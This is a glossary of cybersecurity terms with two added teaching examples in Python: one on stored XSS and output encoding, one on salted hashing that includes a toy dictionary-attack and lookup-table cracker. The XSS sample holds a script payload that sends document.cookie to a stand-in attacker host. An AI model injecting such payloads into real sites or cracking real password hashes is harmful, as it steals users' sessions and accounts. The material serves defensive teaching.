Glossary

Access control:

The process of limiting access to resources based on predetermined rules.


Asset management:

The process of identifying, classifying, and managing an organization's assets, including hardware, software, and data.


Asymmetric encryption:

A type of encryption that uses a pair of mathematically related keys: a public key that can be shared freely and a private key that must be kept secret. Data encrypted with the public key can be decrypted only with the matching private key; the same key pair also underpins digital signatures.


Authentication:

The process of verifying the identity of a user or device.


Authorization:

The process of granting or denying access to resources based on an authenticated identity.


Black hat:

A type of hacker who engages in illegal or malicious activities, such as stealing data or spreading malware.


Blue team:

A group responsible for defending against and responding to security threats.


Brute Force Attack:

A type of password attack in which the attacker uses a program to try every possible combination of characters until the correct password is found.


Buffer overflow:

A vulnerability in which a program writes more data into a fixed-size buffer than it can hold, overwriting adjacent memory. Depending on what is overwritten (other variables, a return address, a function pointer), the result ranges from a crash to execution of attacker-supplied code.


Buffer Overflow Attack:

An attack that deliberately triggers a buffer overflow by supplying oversized input crafted so that the overwritten memory (typically a return address or function pointer) redirects the program to crash or to execute attacker-chosen code.


Business continuity plan (BCP):

A plan that outlines the steps an organization should take to ensure that its critical functions can continue in the event of a disaster or other disruption.


Change management:

The process of controlling and documenting changes to a system or network to ensure that they are implemented safely and effectively.


Cross-site scripting (XSS):

A web application vulnerability in which attacker-controlled input is placed into a page without proper output encoding, so the attacker's script runs in other users' browsers with the privileges of that site (for example, reading session cookies or performing actions on the victim's behalf).
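
As an added example that is not part of the original glossary, the following Python shows the server-side cause of a stored XSS and its usual fix. The comment strings, the page template and the helper names are all constructed for illustration; the only library call is the standard library's html.escape.

```python
import html

# Constructed sample inputs: an attacker's comment and a harmless one.
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
BENIGN_COMMENT = "Great post, thanks! 5 > 3 & counting"


def render_comment_vulnerable(author: str, comment: str) -> str:
    """Builds the page by string concatenation: whatever the user typed becomes
    part of the HTML markup, so a <script> tag in a stored comment is executed
    by every browser that later loads the page (stored XSS)."""
    return f"<div class='comment'><b>{author}</b>: {comment}</div>"


def render_comment_safe(author: str, comment: str) -> str:
    """HTML-encodes every untrusted value before it is placed in text content.
    html.escape turns < > & " ' into entities, so the browser shows the
    attacker's payload as visible text instead of parsing it as markup."""
    return (
        "<div class='comment'><b>"
        + html.escape(author, quote=True)
        + "</b>: "
        + html.escape(comment, quote=True)
        + "</div>"
    )


def contains_script_tag(rendered_html: str) -> bool:
    """Crude check used only to make the difference visible in a test:
    does the rendered output still contain a literal <script start tag?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable("mallory", ATTACKER_COMMENT))
    print("safe:      ", render_comment_safe("mallory", ATTACKER_COMMENT))
```

Note that html.escape is the right encoding only for HTML text content and quoted attribute values; input placed inside a script block, a URL or a CSS rule needs the encoding for that context, which is why templating engines that auto-escape per context are preferred over hand-built strings.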


Cryptography:

The practice of securing communication and data with mathematical techniques (ciphers, hash functions, and digital signatures) to provide confidentiality, integrity, and authenticity.


Data classification:

The process of categorizing data based on its sensitivity and value.


Data loss prevention (DLP):

A security strategy that aims to prevent the unauthorized disclosure or loss of sensitive data.


Data masking:

The process of obscuring sensitive data to protect it from unauthorized access.


Data privacy:

The protection of personal information from unauthorized access and use.


DDoS:

Short for "distributed denial of service," it refers to an attack that floods a target with traffic from many sources at once (typically a botnet of compromised machines), exhausting its bandwidth or resources so that legitimate users cannot reach the service.


Decryption:

The process of converting ciphertext into plaintext (readable text) to access secure data.


Dictionary Attack:

A type of password attack in which the attacker tries candidates from a prepared list of likely passwords (common passwords, dictionary words, leaked credentials and simple variations of them) rather than every possible combination of characters.


Disaster recovery plan (DRP):

A plan that outlines the steps an organization should take to recover from a disaster or other disruption.


Encryption:

The process of converting plaintext into ciphertext (unreadable text) to secure data.


Endpoint security:

The protection of devices that connect to a network.


Exploit:

A piece of code or tool that takes advantage of a vulnerability to gain unauthorized access or perform other malicious actions.


Firewall:

A security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.


Gray hat:

A type of hacker who may engage in both legal and illegal activities, depending on the situation.


Hash function:

A mathematical function that maps an input of any length (the "message") to a fixed-size output (the "hash value" or "digest"). A cryptographic hash function is additionally one-way and collision-resistant: it is infeasible to recover the message from its digest or to find two different messages with the same digest.


Hashing:

The process of computing a fixed-size representation of data, called a hash or digest. Because the output space is finite, collisions must exist, but a good cryptographic hash makes them infeasible to find, so the digest serves as a practical fingerprint of the original data for integrity checks and password storage.


Incident response:

The process of responding to and managing the aftermath of a security incident.


Intrusion detection system (IDS):

A system that monitors network traffic for signs of suspicious activity and alerts administrators when a potential threat is detected.


Intrusion prevention system (IPS):

A system that monitors network traffic for signs of suspicious activity and automatically takes action to prevent potential threats.


Least privilege:

The practice of granting users and processes the minimum level of access necessary to perform their tasks.


Malware:

Short for "malicious software," it refers to any software designed to cause harm or exploit vulnerabilities on a computer system.


Multi-factor authentication (MFA):

A security process in which a user must present authentication factors from at least two independent categories: something they know (a password or PIN), something they have (a hardware token or phone), or something they are (a biometric).


Nmap:

A free and open-source network scanner used to discover hosts, open ports and services on a network by sending packets and analysing the responses (nmap.org).


Password Attack:

A type of attack in which the attacker attempts to guess or crack a password to gain unauthorized access.


Password manager:

A tool that stores passwords in an encrypted vault protected by a master secret, so that users can have a long, unique, random password for every account without memorising them.


Patch:

A piece of software designed to fix a vulnerability in a system or application.


Penetration testing:

The practice of simulating a cyber attack on a system or network to test its defenses and identify vulnerabilities.


Phishing:

A type of social engineering attack that involves tricking people into revealing sensitive information or clicking on malicious links.


Rainbow Table:

A precomputed table of hash chains that lets an attacker reverse unsalted password hashes far faster than hashing every candidate again for each target; a space/time trade-off that per-password salting defeats.


Ransomware:

A type of malware that encrypts a victim's files and demands a ransom from the victim to restore access.


Red team:

A group that plays the role of an enemy or competitor to provide security feedback from that perspective.


Rootkit:

A type of malware that hides its presence (and that of other malicious components) from the operating system and security tools, typically by running with administrative or kernel-level privileges after that access has been obtained by another means.


Salting:

The practice of adding a random, per-password value (the salt) to a password before hashing it, and storing the salt alongside the digest. Identical passwords then produce different digests, so precomputed tables such as rainbow tables are useless and each password must be attacked separately.
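
The Hashing, Dictionary Attack, Rainbow Table and Salting entries describe one story; the Python below, added here and not part of the original glossary, plays it out end to end. The wordlist is a constructed stand-in for a leaked-password list, the "table" is a plain dictionary standing in for a real rainbow table (which stores hash chains to save space), and the iteration count and helper names are assumptions. Everything uses the standard library's hashlib and secrets.

```python
import hashlib
import secrets

# Constructed wordlist: a tiny stand-in for the large leaked-password lists
# an attacker feeds to a dictionary attack.
WORDLIST = ["123456", "password", "letmein", "qwerty", "hunter2", "admin"]


def unsalted_hash(password: str) -> str:
    """A bare SHA-256 of the password. Every user who picks the same password
    gets the same digest, so one precomputed table cracks all of them at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def new_salt(nbytes: int = 16) -> bytes:
    """Fresh random salt per password. It is stored next to the digest; it is not secret."""
    return secrets.token_bytes(nbytes)


def salted_hash(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """PBKDF2-HMAC-SHA256 over password and salt. The salt makes every digest
    unique; the iteration count makes each guess deliberately slow."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return dk.hex()


def build_lookup_table(wordlist) -> dict:
    """The attacker's precomputed table (digest -> password). A real rainbow
    table stores hash chains instead of every digest; this plain dictionary
    is the same idea without the space optimisation."""
    return {unsalted_hash(w): w for w in wordlist}


def crack_unsalted(digest: str, table: dict):
    """Reversing an unsalted digest is a single table lookup, whoever the user is."""
    return table.get(digest)


def crack_salted(digest: str, salt: bytes, wordlist, iterations: int = 100_000):
    """Dictionary attack against a salted digest. The table above is useless:
    every candidate has to be rehashed with this user's salt and iteration count."""
    for candidate in wordlist:
        if salted_hash(candidate, salt, iterations) == digest:
            return candidate
    return None


def verify_password(password: str, salt: bytes, stored_digest: str,
                    iterations: int = 100_000) -> bool:
    """Server-side login check: recompute the digest and compare in constant time."""
    return secrets.compare_digest(salted_hash(password, salt, iterations), stored_digest)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted hunter2 ->", crack_unsalted(unsalted_hash("hunter2"), table))
    salt = new_salt()
    digest = salted_hash("hunter2", salt)
    print("salted lookup   ->", crack_unsalted(digest, table))          # None
    print("salted dict attack ->", crack_salted(digest, salt, WORDLIST))  # still found: weak password
```

Salting removes the precomputation shortcut but does nothing about a weak password: the last line still recovers "hunter2" because it is in the wordlist. The slow, salted hash buys time per guess; password length and uniqueness are what make the dictionary attack fail.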


Script kiddie:

A person who uses pre-existing tools and scripts to carry out hacking attacks, without having a deep understanding of how they work.


Security incident:

A breach of security that results in unauthorized access or other malicious activity.


Security incident response plan (SIRP):

A plan of action for responding to and recovering from a security incident.


Security information and event management (SIEM):

A platform that collects and centralizes logs and events from across an organization (endpoints, servers, network devices, identity providers, cloud services), normalizes and correlates them, and raises alerts on suspicious patterns; it is the primary detection and investigation tool of a security operations center (SOC).


Security operations center (SOC):

A centralized unit responsible for monitoring and responding to security threats.


Security orchestration, automation, and response (SOAR):

A platform that connects security tools (such as a SIEM, a ticketing system, and endpoint and firewall controls) and runs playbooks to automate repetitive incident-handling steps, for example enriching an alert with threat intelligence, opening a case, or isolating a host.


Single sign-on (SSO):

A system that allows users to use a single set of login credentials to access multiple applications.


Social engineering:

A type of attack that relies on psychological manipulation to trick people into revealing sensitive information or taking actions that compromise security.


SQL injection:

A vulnerability in which untrusted input is concatenated into an SQL query, letting an attacker change the query's structure (for example, with a quote character and a comment marker) to bypass authentication, read or modify data, or run database commands. Parameterized (prepared) queries, which keep the SQL text fixed and bind input only as data, prevent it.


Symmetric encryption:

A type of encryption that uses the same secret key to both encrypt and decrypt data, so the key must be shared securely between the communicating parties in advance.


Threat hunting:

The proactive search for potential security threats within an organization's network.


Threat intelligence:

The collection and analysis of information about potential threats to an organization.


Two-factor authentication (2FA):

A form of multi-factor authentication in which exactly two factors from different categories are required, for example a password plus a one-time code from an authenticator app or hardware token.


Virtual Private Network (VPN):

An encrypted tunnel that carries a user's or site's traffic across an untrusted network such as the internet, so that a remote private network can be reached as if the user were connected to it locally.


Vulnerability:

A weakness in a system or application that can be exploited by an attacker.


Vulnerability management:

The process of identifying, classifying, and mitigating vulnerabilities in a system or network.


White hat:

A type of hacker who uses their skills for ethical purposes, such as helping organizations improve their security.


Zero-day:

A vulnerability that is unknown to the software vendor, and therefore unpatched, at the time it is discovered or exploited; the term is also used for the exploit itself and, loosely, for active exploitation that occurs before a fix is available.